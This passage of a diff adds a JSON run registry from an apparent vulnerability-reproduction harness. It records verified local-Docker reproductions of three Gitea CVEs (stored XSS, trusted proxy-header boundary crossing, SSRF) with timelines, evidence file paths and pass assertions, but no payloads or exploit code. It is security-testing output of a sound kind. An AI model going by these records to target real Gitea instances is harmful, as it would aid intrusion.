+      "baseline_title": "Gitea Stored XSS Fixture",
+      "proof_title": "Gitea Stored XSS Fixture - proof",
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:28:13+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2021-28378"
+      },
+      {
+        "at": "2026-03-18T01:28:13+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-xss"
+      },
+      {
+        "at": "2026-03-18T01:28:13+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:28:16+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:16+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:28:16+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:16+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:28:17+00:00",
+        "step": "browser-replay-before-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:17+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:18+00:00",
+        "step": "browser-replay-after-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:18+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:28:19+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:28:19+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2021-28378-20260318012813"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "stored payload rendered inside the browser proof page"
+        },
+        {
+          "name": "browser-present",
+          "kind": "browser-present",
+          "passed": true,
+          "detail": "browser evidence captured"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:28:13+00:00",
+    "finished_at": "2026-03-18T01:28:19+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json"
+    },
+    "browser_links": [
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-xss",
+      "vuln_family": "xss",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Browser proof page renders the stored XSS marker after the controlled payload."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed stored content page before browser proof capture."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner stores inert script payload and captures proof page."
+        }
+      ],
+      "browser_assertions": {
+        "required": true
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed stored content page before browser proof capture.",
+      "Runner stores inert script payload and captures proof page.",
+      "Browser proof page renders the stored XSS marker after the controlled payload."
+    ],
+    "progress": {
+      "completed": 12,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "browser",
+        "label": "\u6d4f\u89c8\u5668\u8bc1\u636e",
+        "count": 10,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+            "label": "baseline.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+            "label": "baseline-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+            "label": "baseline-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+            "label": "baseline-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+            "label": "baseline-page.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+            "label": "proof.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+            "label": "proof-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+            "label": "proof-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+            "label": "proof-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json",
+            "label": "proof-page.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2020-13246-20260318012806",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2020-13246",
+    "repro_profile_id": "gitea-proxy-boundary",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.proxy-boundary",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
+      }
+    ],
+    "browser_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "browser_evidence": {
+      "required": true,
+      "present": true,
+      "refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+      ],
+      "baseline_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
+      ],
+      "proof_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+      ],
+      "baseline_title": "Gitea Proxy Boundary Fixture",
+      "proof_title": "Gitea Proxy Boundary Fixture - proof",
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:28:06+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2020-13246"
+      },
+      {
+        "at": "2026-03-18T01:28:06+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-proxy-boundary"
+      },
+      {
+        "at": "2026-03-18T01:28:07+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "browser-replay-before-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:10+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:11+00:00",
+        "step": "browser-replay-after-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:11+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:28:13+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:28:13+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2020-13246-20260318012806"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "trusted forwarded headers crossed the boundary"
+        },
+        {
+          "name": "browser-present",
+          "kind": "browser-present",
+          "passed": true,
+          "detail": "browser evidence captured"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:28:06+00:00",
+    "finished_at": "2026-03-18T01:28:13+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json"
+    },
+    "browser_links": [
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-proxy-boundary",
+      "vuln_family": "proxy-boundary",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Local fixture proves trusted proxy headers cross the admin boundary."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed forwarded-header boundary fixture with clean state."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner performs local forwarded-header trust proof only inside the fixture."
+        }
+      ],
+      "browser_assertions": {
+        "required": true
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed forwarded-header boundary fixture with clean state.",
+      "Runner performs local forwarded-header trust proof only inside the fixture.",
+      "Local fixture proves trusted proxy headers cross the admin boundary."
+    ],
+    "progress": {
+      "completed": 12,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "browser",
+        "label": "\u6d4f\u89c8\u5668\u8bc1\u636e",
+        "count": 10,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+            "label": "baseline.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+            "label": "baseline-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+            "label": "baseline-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+            "label": "baseline-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+            "label": "baseline-page.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+            "label": "proof.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+            "label": "proof-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+            "label": "proof-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+            "label": "proof-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json",
+            "label": "proof-page.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2018-15192-20260318012749",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2018-15192",
+    "repro_profile_id": "gitea-ssrf",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.ssrf",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
+      }
+    ],
+    "browser_refs": [],
+    "browser_evidence": {
+      "required": false,
+      "present": false,
+      "refs": [],
+      "baseline_refs": [],
+      "proof_refs": [],
+      "baseline_title": null,
+      "proof_title": null,
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:27:49+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2018-15192"
+      },
+      {
+        "at": "2026-03-18T01:27:49+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-ssrf"
+      },
+      {
+        "at": "2026-03-18T01:27:49+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:27:52+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:27:54+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:27:54+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2018-15192-20260318012749"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "server-side callback reached the local sink"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:27:49+00:00",
+    "finished_at": "2026-03-18T01:27:54+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd"
+    },
+    "dashboard_refs": {
